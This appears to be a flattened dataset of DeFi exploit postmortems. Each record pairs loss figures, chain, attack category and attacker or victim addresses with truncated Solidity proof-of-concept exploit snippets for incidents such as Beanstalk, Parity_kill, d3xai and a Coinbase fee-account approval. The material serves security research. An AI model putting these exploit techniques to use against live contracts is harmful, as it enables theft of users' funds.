https://bscscan.com/tx/0x1397bc7f0d284f8e2e30d0a9edd0db1f3eb0dd284c75e30d226b02bf09ad068f
https://x.com/TenArmorAlert/status/1954774967481962832
https://x.com/TenArmorAlert/status/1954774967481962832
$38
7.62
medium
WXC_Token Exploit (2025-08)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 3.3 BNB // Attacker : https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825 // Attack Contract : https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0...
exploit_poc
PDZ
2025-08
PDZ_exp.sol
null
dace6ad82f792cfb
2026-01-07T10:59:16.518820
postmortems
bsc
null
3.3 BNB
3,300,000,000
https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825
https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0879fa0cb81
https://bscscan.com/address/0x664201579057f50D23820d20558f4b61bd80BDda
https://bscscan.com/tx/0x81fd00eab3434eac93bfdf919400ae5ca280acd891f95f47691bbe3cbf6f05a5
null
https://x.com/tikkalaresearch/status/1957500585965678828
true
true
false
critical
3.3 BNB
unknown
function testExploit() public balanceLog { // Step 1: borrow 10 WBNB IPancakePair(PANCAKE_PAIR).swap(10 ether, 0, address(this), hex"00"); }
true
3.3 BNB
https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825
https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0879fa0cb81
https://bscscan.com/address/0x664201579057f50D23820d20558f4b61bd80BDda
https://bscscan.com/tx/0x81fd00eab3434eac93bfdf919400ae5ca280acd891f95f47691bbe3cbf6f05a5
https://x.com/tikkalaresearch/status/1957500585965678828
$3300.00M
7.74
medium
PDZ Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 100k USD // Attacker : https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf // Attack Contract : https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537...
exploit_poc
EverValueCoin
2025-08
EverValueCoin_exp.sol
flash_loan
bd16709dce2bfffc
2026-01-07T10:59:16.518869
postmortems
arbitrum
null
100k USD
100,000
https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf
https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537b0a05786df8
https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0
https://arbiscan.io/tx/0xb13b2ab202cb902b8986cbd430d7227bf3ddca831b79786af145ccb5f00fcf3f
https://x.com/SuplabsYi/status/1961906638438445268
https://x.com/SuplabsYi/status/1961906638438445268
true
true
true
high
100k USD
flash-loan
function testExploit() public balanceLog { //implement exploit code here morphoBlue.flashLoan(address(wbtc), 1200000000, ""); }
true
100k USD
https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf
https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537b0a05786df8
https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0
https://arbiscan.io/tx/0xb13b2ab202cb902b8986cbd430d7227bf3ddca831b79786af145ccb5f00fcf3f
https://x.com/SuplabsYi/status/1961906638438445268
https://x.com/SuplabsYi/status/1961906638438445268
$100.0K
9.06
high
EverValueCoin Exploit (2025-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 17k USD // Attacker : https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3 // Attack Contract : https://bscscan.com/address/0x90be00229fe8000000009e007743a48...
exploit_poc
MulticallWithXera
2025-08
MulticallWithXera_exp.sol
null
b46153bc70d25a7d
2026-01-07T10:59:16.518930
postmortems
bsc
null
17k USD
17,000
https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3
https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7
https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7
https://bscscan.com/tx/0xed6fd61c1eb2858a1594616ddebaa414ad3b732dcdb26ac7833b46803c5c18db
https://x.com/TenArmorAlert/status/1958354933247590450
https://x.com/TenArmorAlert/status/1958354933247590450
true
true
false
medium
17k USD
unknown
function testExploit() public balanceLog { // The core of the exploit is to abuse the token approval granted by the victim to // the Multicall contract. // 1. Craft the malicious calldata. // The parameters are: // - from: the `victim` contract's address. // - to: the `...
true
17k USD
https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3
https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7
https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7
https://bscscan.com/tx/0xed6fd61c1eb2858a1594616ddebaa414ad3b732dcdb26ac7833b46803c5c18db
https://x.com/TenArmorAlert/status/1958354933247590450
https://x.com/TenArmorAlert/status/1958354933247590450
$17.0K
8.15
high
MulticallWithXera Exploit (2025-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 40k USDC // Attacker : https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0 // Attack Contract : https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52...
exploit_poc
0x8d2e
2025-08
0x8d2e_exp.sol
access_control
2316b4ba0d1be03a
2026-01-07T10:59:16.518982
postmortems
base
null
40k USDC
40,000
https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0
https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52fae1b24a81440
https://basescan.org/address/0x8d2Ef0d39A438C3601112AE21701819E13c41288
https://basescan.org/tx/0x6be0c4b5414883a933639c136971026977df4737b061f864a4a04e4bd7f07106
null
https://x.com/TenArmorAlert/status/1958354933247590450
true
true
true
medium
40k USDC
access-control
function testExploit() public balanceLog { uint256 balance = IERC20(USDC_ADDR).balanceOf(VICTIM); bytes memory data= abi.encode(USDC_ADDR, address(this)); // The victim contract (0x8d2e) lacks access control in its uniswapV3SwapCallback function. // As a result, it transfers all USDC to ...
true
40k USDC
https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0
https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52fae1b24a81440
https://basescan.org/address/0x8d2Ef0d39A438C3601112AE21701819E13c41288
https://basescan.org/tx/0x6be0c4b5414883a933639c136971026977df4737b061f864a4a04e4bd7f07106
https://x.com/TenArmorAlert/status/1958354933247590450
$40.0K
7.88
medium
0x8d2e Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 190 BNB // Attacker : https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d // Attack Contract : https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84...
exploit_poc
d3xai
2025-08
d3xai_exp.sol
null
0f0ee7de17a79d34
2026-01-07T10:59:16.519071
postmortems
bsc
null
190 BNB
190,000,000,000
https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d
https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84995d9aa27c
null
https://bscscan.com/tx/0x26bcefc152d8cd49f4bb13a9f8a6846be887d7075bc81fa07aa8c0019bd6591f
null
https://x.com/suplabsyi/status/1956695597546893598
true
true
false
critical
190 BNB
unknown
function testExploit() public balanceLog { // Root cause: the proxy’s exchange() lets us buy low / sell high // Attacker exploits it using a convoluted multi-step flow // Step 1: flash loan 20M USDT uint256 borrowAmount = 20_000_000 ether; IPancakeV3PoolActions(PANCAKE_V3_POOL)....
true
190 BNB
https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d
https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84995d9aa27c
https://bscscan.com/tx/0x26bcefc152d8cd49f4bb13a9f8a6846be887d7075bc81fa07aa8c0019bd6591f
https://x.com/suplabsyi/status/1956695597546893598
$190000.00M
8
high
d3xai Exploit (2025-08)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 300k USD // Attacker : https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649 // Attack Contract : https://etherscan.io/address/0xF0D539955974b248d763D60C366...
exploit_poc
coinbase
2025-08
coinbase_exp.sol
null
ab37458294c19e6d
2026-01-07T10:59:16.519156
postmortems
ethereum
null
300k USD
300,000
https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649
https://etherscan.io/address/0xF0D539955974b248d763D60C3663eF272dfC6971
null
https://etherscan.io/tx/0x33b2cb5bc3c0ccb97f0cc21e231ecb6457df242710dfce8d1b68935f0e05773b
null
https://x.com/deeberiroz/status/1955718986894549344
true
true
false
high
300k USD
unknown
function testExploit() public balanceLog { // Root cause: A Coinbase fee account accidentally approved multiple ERC-20 tokens to a 0x swapper. // The swapper lets anyone execute arbitrary calls. // For example: // https://etherscan.io/tx/0x8df54ebe76c09cda530f1fccb591166c716000ec95ee5cb3...
true
300k USD
https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649
https://etherscan.io/address/0xF0D539955974b248d763D60C3663eF272dfC6971
https://etherscan.io/tx/0x33b2cb5bc3c0ccb97f0cc21e231ecb6457df242710dfce8d1b68935f0e05773b
https://x.com/deeberiroz/status/1955718986894549344
$300.0K
6.81
medium
coinbase Exploit (2025-08)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4k USD // Attacker : https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24 // Attack Contract : https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b9...
exploit_poc
0xf340
2025-08
0xf340_exp.sol
access_control
d3b839e16d0a0eae
2026-01-07T10:59:16.519208
postmortems
ethereum
null
4k USD
4,000
https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24
https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b900410ea1d36
https://etherscan.io/address/0xf340bd3eb3e82994cff5b8c3493245edbce63436
https://etherscan.io/tx/0x103b4550a1a2bdb73e3cb5ea484880cd8bed7e4842ecdd18ed81bf67ed19e03c
https://t.me/defimon_alerts/1733
null
true
true
true
low
4k USD
access-control
function testExploit() public balanceLog { //The victim contract (0xf340) lacks access control in its initVRF function allowing //an attacker to set an address into storage and calling the function 0x607d60e6 with //a 0 ether value which transfers LINK to that address set by the attacker. ...
true
4k USD
https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24
https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b900410ea1d36
https://etherscan.io/address/0xf340bd3eb3e82994cff5b8c3493245edbce63436
https://etherscan.io/tx/0x103b4550a1a2bdb73e3cb5ea484880cd8bed7e4842ecdd18ed81bf67ed19e03c
https://t.me/defimon_alerts/1733
$4.0K
8.24
high
0xf340 Exploit (2025-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 500 USD // Attacker : https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46 // Attack Contract : https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b...
exploit_poc
Hexotic
2025-08
Hexotic_exp.sol
null
8f600c9d3a00da35
2026-01-07T10:59:16.519257
postmortems
ethereum
null
500 USD
500
https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46
https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b20834b70d4c5
https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0
https://etherscan.io/tx/0x23b69bef57656f493548a5373300f7557777f352ade8131353ff87a1b27e2bb3
https://t.me/defimon_alerts/1757
null
true
true
false
low
500 USD
unknown
function testExploit() public balanceLog { //// Fund the test contract with 0.1 ETH to pay for gas and initial transactions. vm.deal(address(this), 0.1 ether); WETH.deposit{value: 0.037 ether}(); // Initiate a flash swap on the HEX Uniswap V3 Pool. IPancakeV3Pool(uniswap...
true
500 USD
https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46
https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b20834b70d4c5
https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0
https://etherscan.io/tx/0x23b69bef57656f493548a5373300f7557777f352ade8131353ff87a1b27e2bb3
https://t.me/defimon_alerts/1757
$500
7.38
medium
Hexotic Exploit (2025-08)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 19.7k USD // Attacker : https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da // Attack Contract : https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810...
exploit_poc
SizeCredit
2025-08
SizeCredit_exp.sol
oracle_manipulation
eb0683ba22400e82
2026-01-07T10:59:16.519307
postmortems
ethereum
null
19.7k USD
19,700
https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da
https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810f163b9b0fd3a71
https://etherscan.io/address/0xf4a21ac7e51d17a0e1c8b59f7a98bb7a97806f14
https://etherscan.io/tx/0xc7477d6a5c63b04d37a39038a28b4cbaa06beb167e390d55ad4a421dbe4067f8
null
https://x.com/SuplabsYi/status/1956306748073230785
true
true
true
medium
19.7k USD
oracle-manipulation
function testExploit() public balanceLog { // Root cause: leverageUpWithSwap lacks check of given data, attacker passed malicious data to execute arbitrary calls IERC20 wstUSR = IERC20(PT_WSTUSR); uint256 bal = wstUSR.balanceOf(VICTIM); uint256 allowance = wstUSR.allowance(VICTIM, LEVERA...
true
19.7k USD
https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da
https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810f163b9b0fd3a71
https://etherscan.io/address/0xf4a21ac7e51d17a0e1c8b59f7a98bb7a97806f14
https://etherscan.io/tx/0xc7477d6a5c63b04d37a39038a28b4cbaa06beb167e390d55ad4a421dbe4067f8
https://x.com/SuplabsYi/status/1956306748073230785
$19.7K
9.53
high
SizeCredit Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 61k USD // Attacker : https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c // Attack Contract : https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC...
exploit_poc
Grizzifi
2025-08
Grizzifi_exp.sol
null
9a167ed731c822c4
2026-01-07T10:59:16.519368
postmortems
bsc
null
61k USD
61,000
https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c
https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC74AA0c1128
https://bscscan.com/address/0x21ab8943380b752306abf4d49c203b011a89266b
https://bscscan.com/tx/0x36438165d701c883fd9a03631ee0cdeec35a138153720006ab59264db7e075c1
null
https://x.com/MetaTrustAlert/status/1955967862276829375
true
true
false
medium
61k USD
unknown
function testExploit() public balanceLog { //implement exploit code here // Step 1: create 30 attack contracts and send 20 bsc-usd to each attack contract // https://bscscan.com/tx/0x4302de51c8126e7934da9be1affbde73e5153fe1f9d0200a738a269fe07d22c7 for (uint256 i = 0; i < 30; i++) { ...
true
61k USD
https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c
https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC74AA0c1128
https://bscscan.com/address/0x21ab8943380b752306abf4d49c203b011a89266b
https://bscscan.com/tx/0x36438165d701c883fd9a03631ee0cdeec35a138153720006ab59264db7e075c1
https://x.com/MetaTrustAlert/status/1955967862276829375
$61.0K
7.92
medium
Grizzifi Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 21k USD // Attacker : 0x59537353248d0b12c7fcca56a4e420ffec4abc91 // Attack Contract : 0x091101b0f31833c03dddd5b6411e62a212d05875 // Vulnerable Contract : 0xbeb0b0623f66bE8cE1...
exploit_poc
Bebop_dex
2025-08
Bebop_dex_exp.sol
null
cd8872895db092c2
2026-01-07T10:59:16.519425
postmortems
arbitrum
null
21k USD
21,000
null
null
null
https://arbiscan.io/tx/0xe5f8fe69b38613a855dbcb499a2c4ecffe318c620a4c4117bd0e298213b7619d
https://x.com/SuplabsYi/status/1955230173365961128
https://x.com/SuplabsYi/status/1955230173365961128
true
true
false
medium
21k USD
unknown
function testExploit() public balanceLog { // 1. Construct the JamOrder struct JamOrder memory order = JamOrder({ taker: address(this), receiver: address(this), expiry: 1754987701, exclusivityDeadline: 0, nonce: 1, executor: address...
true
21k USD
https://arbiscan.io/tx/0xe5f8fe69b38613a855dbcb499a2c4ecffe318c620a4c4117bd0e298213b7619d
https://x.com/SuplabsYi/status/1955230173365961128
https://x.com/SuplabsYi/status/1955230173365961128
$21.0K
7.21
medium
Bebop_dex Exploit (2025-08)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 78k USD // Attacker : https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d // Attack Contract : https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20...
exploit_poc
YuliAI
2025-08
YuliAI_exp.sol
flash_loan
e26b29843d0ab278
2026-01-07T10:59:16.519476
postmortems
bsc
null
78k USD
78,000
https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d
https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20638115ffaa
https://bscscan.com/address/0x8262325Bf1d8c3bE83EB99f5a74b8458Ebb96282
https://bscscan.com/tx/0xeab946cfea49b240284d3baef24a4071313d76c39de2ee9ab00d957896a6c1c4
null
https://x.com/TenArmorAlert/status/1955817707808432584
true
true
true
medium
78k USD
flash-loan
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); vm.deal(address(attackContract), 0.01 ether); attackContract.swap(YULIAI, VICTIM, 200_000 ether); } } contract AttackContract { address public owner; constructor() { owner = msg....
true
78k USD
https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d
https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20638115ffaa
https://bscscan.com/address/0x8262325Bf1d8c3bE83EB99f5a74b8458Ebb96282
https://bscscan.com/tx/0xeab946cfea49b240284d3baef24a4071313d76c39de2ee9ab00d957896a6c1c4
https://x.com/TenArmorAlert/status/1955817707808432584
$78.0K
9.27
high
YuliAI Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 10,062 BUSD // Attacker : https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c // Attack Contract : https://bscscan.com/address/0x90e076ef0fed49a0b6393898...
exploit_poc
ABCCApp
2025-08
ABCCApp_exp.sol
flash_loan
8f306068d87a0a36
2026-01-07T10:59:16.519526
postmortems
bsc
null
~ 10,062 BUSD
10
https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c
https://bscscan.com/address/0x90e076ef0fed49a0b63938987f2cad6b4cd97a24
https://bscscan.com/address/0x1bc016c00f8d603c41a582d5da745905b9d034e5
https://bscscan.com/tx/0xee4eae6f70a6894c09fda645fb24ab841e9847a788b1b2e8cb9cc50c1866fb12
null
https://x.com/TenArmorAlert/status/1959457212914352530
true
true
true
low
~ 10,062 BUSD
flash-loan
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); attackContract.start(); } receive() external payable {} } contract AttackContract { address attacker; uint256 borrowedAmount = 12_500_000_000_000_000_000_000; constructor() { a...
true
~ 10,062 BUSD
https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c
https://bscscan.com/address/0x90e076ef0fed49a0b63938987f2cad6b4cd97a24
https://bscscan.com/address/0x1bc016c00f8d603c41a582d5da745905b9d034e5
https://bscscan.com/tx/0xee4eae6f70a6894c09fda645fb24ab841e9847a788b1b2e8cb9cc50c1866fb12
https://x.com/TenArmorAlert/status/1959457212914352530
$10
9.06
high
ABCCApp Exploit (2025-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface parity { function isOwner( address _addr ) external view returns (bool); function kill( address _to ) external; function initWallet(address[] memory ...
exploit_poc
Parity_kill
2017-11
Parity_kill_exp.sol
null
d19520035888d002
2026-01-07T10:59:16.519574
postmortems
unknown
4,501,735
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { WalletLibrary.isOwner(address(this)); // not a owner of contract owner.push(address(this)); WalletLibrary.initWallet(owner, 0, 0); bool isowner = WalletLibrary.isOwner(address(this)); // you are owner of contract now assertTrue(isowner); Wa...
true
Unknown
2.61
low
Parity_kill Exploit (2017-11)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c)); IERC20 busd = IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56); IERC20 wdoge =...
exploit_poc
Wdoge
2022-04
Wdoge_exp.sol
null
d9cb2b059b7abda2
2026-01-07T10:59:16.519612
postmortems
unknown
17,248,705
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { IPancakePair(BUSDT_WBNB_Pair).swap(0, 2900 ether, address(this), "0x"); }
true
Unknown
2.89
low
Wdoge Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78...
exploit_poc
Gym_1
2022-04
Gym_1_exp.sol
null
65ee71c99bff5876
2026-01-07T10:59:16.519656
postmortems
unknown
16,798,806
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { payable(address(0)).transfer(address(this).balance); emit log_named_uint("Before exploit, USDC balance of attacker:", wbnb.balanceOf(msg.sender)); wbnbBusdPair.swap(2400e18, 0, address(this), new bytes(1)); emit log_named_uint("After exploit, USDC balanc...
true
Unknown
3.74
low
Gym_1 Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IEuler { function flashLoan(address receiver, address token, uint256 amount, bytes calldata data) external returns (bool); } interface ICurve { function exchange(int128 i, int12...
exploit_poc
Saddle
2022-04
Saddle_exp.sol
flash_loan
99a82fd0bb49f7ec
2026-01-07T10:59:16.519700
postmortems
unknown
14,684,306
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { IEuler(eulerLoans).flashLoan(address(this), usdc, 15_000_000e6, new bytes(0)); console.log("USDC hacked: %s", IERC20(usdc).balanceOf(address(this))); }
true
Unknown
4.72
low
Saddle Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); ...
exploit_poc
Beanstalk
2022-04
Beanstalk_exp.sol
flash_loan
07c9396063f71acd
2026-01-07T10:59:16.519749
postmortems
unknown
14,595,905
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { address[] memory path = new address[](2); path[0] = uniswapv2.WETH(); path[1] = address(bean); uniswapv2.swapExactETHForTokens{value: 75 ether}(0, path, address(this), block.timestamp + 120); emit log_named_uint("Initial USDC balancer of attacker",...
true
Unknown
6
medium
Beanstalk Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IERC20 usdc = IERC20(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d); IRToke...
exploit_poc
Rikkei
2022-04
Rikkei_exp.sol
oracle_manipulation
b7b10d175753b0d8
2026-01-07T10:59:16.519812
postmortems
unknown
16,956,474
null
null
null
null
null
null
null
null
false
false
true
medium
null
oracle-manipulation
function testExploit() public { emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(address(this))); rbnb.approve(address(cointroller), type(uint256).max); address[] memory rTokens = new address[](1); rTokens[0] = address(rbnb); cointroller.enterMarket...
true
Unknown
4.08
low
Rikkei Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Akutar NFT Denial of Service(DoS) Exploit PoC There are two serious logic vulnerabilities 1. First can cause a DoS attack due to the missing check if the bidder is a contract. As a result, th...
exploit_poc
AkutarNFT
2022-04
AkutarNFT_exp.sol
null
af9bd97b4f1cf2d9
2026-01-07T10:59:16.519858
postmortems
ethereum
14,636,844
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testDOSAttack() public { address honestUser = 0xca2eB45533a6D5E2657382B0d6Ec01E33a425BF4; address maliciousUser = address(this); // malicious User is a contract address cheats.prank(maliciousUser); //maliciousUser makes a bid akutarNft.bid{value: 3.5 ether}(1); console....
true
Unknown
3.42
low
AkutarNFT Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); IBaseV1Router01 router = IBaseV1Router01(0xa38cd27185a464914D3046f0AB9d43356B3482...
exploit_poc
deus
2022-04
deus_exp.sol
oracle_manipulation
3a82055f0016ca7e
2026-01-07T10:59:16.519908
postmortems
unknown
37,093,708
null
null
null
null
null
null
null
null
false
false
true
medium
null
oracle-manipulation
function testExample() public { cheat.prank(owner_of_usdc); usdc.Swapin( 0x33e48143c6ea17476eeabfa202d8034190ea3f2280b643e2570c54265fe33c98, address(this), 150_000_000 * 10 ** 6 ); uint256 balance_of_usdc = usdc.balanceOf(address(this)); emit log_named_uint("The US...
true
Unknown
5.62
medium
deus Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48); ICEth...
exploit_poc
Rari
2022-04
Rari_exp.sol
flash_loan
7ffa961e45cb89fd
2026-01-07T10:59:16.519959
postmortems
unknown
14,684,813
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { emit log_named_uint("ETH Balance of fETH_127 before borrowing", address(fETH_127).balance / 1e18); payable(address(0)).transfer(address(this).balance); emit log_named_uint("ETH Balance after sending to blackHole", address(this).balance); address[] memor...
true
Unknown
4.62
low
Rari Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED //Credit: W2Ning pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c)); address public BUSD_USDT_Pair = 0x7EFaEf62fDdCCa950418312c6C91Aef3...
exploit_poc
Elephant_Money
2022-04
Elephant_Money_exp.sol
null
32bc54707114ab2b
2026-01-07T10:59:16.520011
postmortems
unknown
16,886,438
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { IPancakePair(BUSDT_WBNB_Pair).swap(0, 100_000 ether, address(this), "0x00"); }
true
Unknown
4.12
low
Elephant_Money Exploit (2022-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // source // https://mp.weixin.qq.com/s/_7vIlVBI9g9IgGpS9OwPIQ // attack tx: 0xc7647406542f8f2473a06fea142d223022370aa5722c044c2b7ea030b8965dd0 // test result // > forge test --contracts ./src/cft...
exploit_poc
cftoken
2022-04
cftoken_exp.sol
null
eb950f91ef86b90a
2026-01-07T10:59:16.520066
postmortems
unknown
16,841,980
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
